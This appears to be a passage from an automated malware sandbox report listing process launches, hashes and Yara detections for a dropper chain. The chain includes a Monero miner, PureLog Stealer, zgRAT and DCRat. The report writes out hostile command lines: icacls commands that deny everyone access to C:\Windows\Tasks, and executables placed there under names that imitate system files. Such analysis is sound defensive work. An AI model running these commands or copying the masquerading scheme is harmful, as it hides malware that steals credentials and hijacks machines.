                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:33
                                                                                                                                                                                                  Start time:17:02:19
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:TIMEOUT /T 1 /NOBREAK
                                                                                                                                                                                                  Imagebase:0xad0000
                                                                                                                                                                                                  File size:25'088 bytes
                                                                                                                                                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:34
                                                                                                                                                                                                  Start time:17:02:20
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\Tasks\Wmiic.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:"C:\windows\tasks\wmiic" start WMService
                                                                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                                                                  File size:373'760 bytes
                                                                                                                                                                                                  MD5 hash:A18BFE142F059FDB5C041A310339D4FD
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:35
                                                                                                                                                                                                  Start time:17:02:20
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:36
                                                                                                                                                                                                  Start time:17:02:20
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:TIMEOUT /T 2 /NOBREAK
                                                                                                                                                                                                  Imagebase:0xad0000
                                                                                                                                                                                                  File size:25'088 bytes
                                                                                                                                                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:37
                                                                                                                                                                                                  Start time:17:02:20
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\Tasks\Wmiic.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\windows\tasks\Wmiic.exe
                                                                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                                                                  File size:373'760 bytes
                                                                                                                                                                                                  MD5 hash:A18BFE142F059FDB5C041A310339D4FD
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:38
                                                                                                                                                                                                  Start time:17:02:20
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:39
                                                                                                                                                                                                  Start time:17:02:20
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\Tasks\IntelConfigService.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:"IntelConfigService.exe"
                                                                                                                                                                                                  Imagebase:0x7ff7554e0000
                                                                                                                                                                                                  File size:1'936'896 bytes
                                                                                                                                                                                                  MD5 hash:58E4115267B276452EDC1F541E3A8198
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                  • Detection: 56%, ReversingLabs
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:42
                                                                                                                                                                                                  Start time:17:02:21
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\Tasks\Wrap.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\Tasks\Wrap.exe
                                                                                                                                                                                                  Imagebase:0x7ff726cf0000
                                                                                                                                                                                                  File size:371'200 bytes
                                                                                                                                                                                                  MD5 hash:39ADB356036E91008843B83EFB61131D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                  • Detection: 65%, ReversingLabs
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:43
                                                                                                                                                                                                  Start time:17:02:21
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "%username%:(R,REA,RA,RD)"
                                                                                                                                                                                                  Imagebase:0x7ff6e92a0000
                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:44
                                                                                                                                                                                                  Start time:17:02:21
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:45
                                                                                                                                                                                                  Start time:17:02:21
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "Users:(R,REA,RA,RD)"
                                                                                                                                                                                                  Imagebase:0x7ff6e92a0000
                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:46
                                                                                                                                                                                                  Start time:17:02:21
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:47
                                                                                                                                                                                                  Start time:17:02:21
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "Administrators:(R,REA,RA,RD))"
                                                                                                                                                                                                  Imagebase:0x7ff6e92a0000
                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:48
                                                                                                                                                                                                  Start time:17:02:21
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:49
                                                                                                                                                                                                  Start time:17:02:21
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:50
                                                                                                                                                                                                  Start time:17:02:21
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "C:\Windows\Tasks\ApplicationsFrameHost.exe" --daemonized
                                                                                                                                                                                                  Imagebase:0x7ff6e92a0000
                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:51
                                                                                                                                                                                                  Start time:17:02:21
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\icacls.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:icacls C:\Windows\Tasks /deny "user-PC$:(R,REA,RA,RD)"
                                                                                                                                                                                                  Imagebase:0x7ff752040000
                                                                                                                                                                                                  File size:39'424 bytes
                                                                                                                                                                                                  MD5 hash:48C87E3B3003A2413D6399EA77707F5D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:52
                                                                                                                                                                                                  Start time:17:02:21
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\icacls.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:icacls C:\Windows\Tasks /deny "Administrators:(R,REA,RA,RD))"
                                                                                                                                                                                                  Imagebase:0x7ff752040000
                                                                                                                                                                                                  File size:39'424 bytes
                                                                                                                                                                                                  MD5 hash:48C87E3B3003A2413D6399EA77707F5D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:53
                                                                                                                                                                                                  Start time:17:02:21
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\Tasks\ApplicationsFrameHost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\Tasks\ApplicationsFrameHost.exe --daemonized
                                                                                                                                                                                                  Imagebase:0x7ff6a9510000
                                                                                                                                                                                                  File size:5'721'088 bytes
                                                                                                                                                                                                  MD5 hash:93CEEF4357070A8DDC0BEAC173547EC1
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000035.00000003.1908378022.0000020033251000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000035.00000002.4148260496.00000200332C1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000035.00000003.2249324527.000002003380A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000035.00000003.2249769366.00000200332C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000035.00000000.1906573384.00007FF6A98B3000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000035.00000002.4148260496.0000020033227000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000035.00000002.4149570382.0000020033819000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000035.00000002.4148260496.0000020033241000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000035.00000003.2249324527.0000020033819000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000035.00000002.4148260496.00000200331F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000035.00000003.1908406838.0000020033254000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Windows\Tasks\ApplicationsFrameHost.exe, Author: Joe Security
                                                                                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Windows\Tasks\ApplicationsFrameHost.exe, Author: Florian Roth
                                                                                                                                                                                                  • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Windows\Tasks\ApplicationsFrameHost.exe, Author: ditekSHen
                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                  • Detection: 62%, ReversingLabs
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:54
                                                                                                                                                                                                  Start time:17:02:21
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\icacls.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:icacls C:\Windows\Tasks /deny "Users:(R,REA,RA,RD)"
                                                                                                                                                                                                  Imagebase:0x7ff752040000
                                                                                                                                                                                                  File size:39'424 bytes
                                                                                                                                                                                                  MD5 hash:48C87E3B3003A2413D6399EA77707F5D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:55
                                                                                                                                                                                                  Start time:17:02:22
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\Tasks\Superfetch.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\Tasks\Superfetch.exe
                                                                                                                                                                                                  Imagebase:0x7ff638400000
                                                                                                                                                                                                  File size:1'702'912 bytes
                                                                                                                                                                                                  MD5 hash:362FFCE5C7C480702A615F1847191F62
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                  • Detection: 68%, ReversingLabs
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:56
                                                                                                                                                                                                  Start time:17:02:22
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\Tasks\MSTask.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\Tasks\MSTask.exe
                                                                                                                                                                                                  Imagebase:0x7ff7b1d90000
                                                                                                                                                                                                  File size:8'939'797 bytes
                                                                                                                                                                                                  MD5 hash:92A9C0EF09F955F9F1BCA837D7AA493F
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                  • Detection: 54%, ReversingLabs
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:57
                                                                                                                                                                                                  Start time:17:02:22
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:58
                                                                                                                                                                                                  Start time:17:02:22
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\net.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:net start WMService
                                                                                                                                                                                                  Imagebase:0xf50000
                                                                                                                                                                                                  File size:47'104 bytes
                                                                                                                                                                                                  MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:59
                                                                                                                                                                                                  Start time:17:02:22
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:C:\Windows\system32\net1 start WMService
                                                                                                                                                                                                  Imagebase:0x8a0000
                                                                                                                                                                                                  File size:139'776 bytes
                                                                                                                                                                                                  MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:60
                                                                                                                                                                                                  Start time:17:02:22
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\Tasks\1.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\windows\tasks\1.exe"
                                                                                                                                                                                                  Imagebase:0x3e0000
                                                                                                                                                                                                  File size:4'088'537 bytes
                                                                                                                                                                                                  MD5 hash:E94C69B02CC5FB2B03FC32AA55760AAF
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000003C.00000003.1921505628.0000000006A67000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000003C.00000003.1922516714.0000000006A62000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Tasks\1.exe, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Tasks\1.exe, Author: Joe Security
                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                  • Detection: 63%, ReversingLabs
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:61
                                                                                                                                                                                                  Start time:17:02:23
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Windows\mJTDsOcOsyMzGWVl2p4lWXwUrl0TR0B.vbe"
                                                                                                                                                                                                  Imagebase:0xb0000
                                                                                                                                                                                                  File size:147'456 bytes
                                                                                                                                                                                                  MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:62
                                                                                                                                                                                                  Start time:17:02:23
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\Tasks\MSTask.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\Tasks\MSTask.exe
                                                                                                                                                                                                  Imagebase:0x7ff7b1d90000
                                                                                                                                                                                                  File size:8'939'797 bytes
                                                                                                                                                                                                  MD5 hash:92A9C0EF09F955F9F1BCA837D7AA493F
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:63
                                                                                                                                                                                                  Start time:17:02:25
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Windows\fwJLoWFGhpY.bat" "
                                                                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:64
                                                                                                                                                                                                  Start time:17:02:25
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:65
                                                                                                                                                                                                  Start time:17:02:25
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\Bridgeprovider.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:"C:\Windows/Bridgeprovider.exe"
                                                                                                                                                                                                  Imagebase:0xcb0000
                                                                                                                                                                                                  File size:3'766'784 bytes
                                                                                                                                                                                                  MD5 hash:BF9DDFDD875FA2BADBE94E88A1FC4214
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000041.00000000.1945948494.0000000000CB2000.00000002.00000001.01000000.00000022.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000041.00000002.2015361827.00000000137A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Bridgeprovider.exe, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Bridgeprovider.exe, Author: Joe Security
                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                  • Detection: 63%, ReversingLabs
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:66
                                                                                                                                                                                                  Start time:17:02:29
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
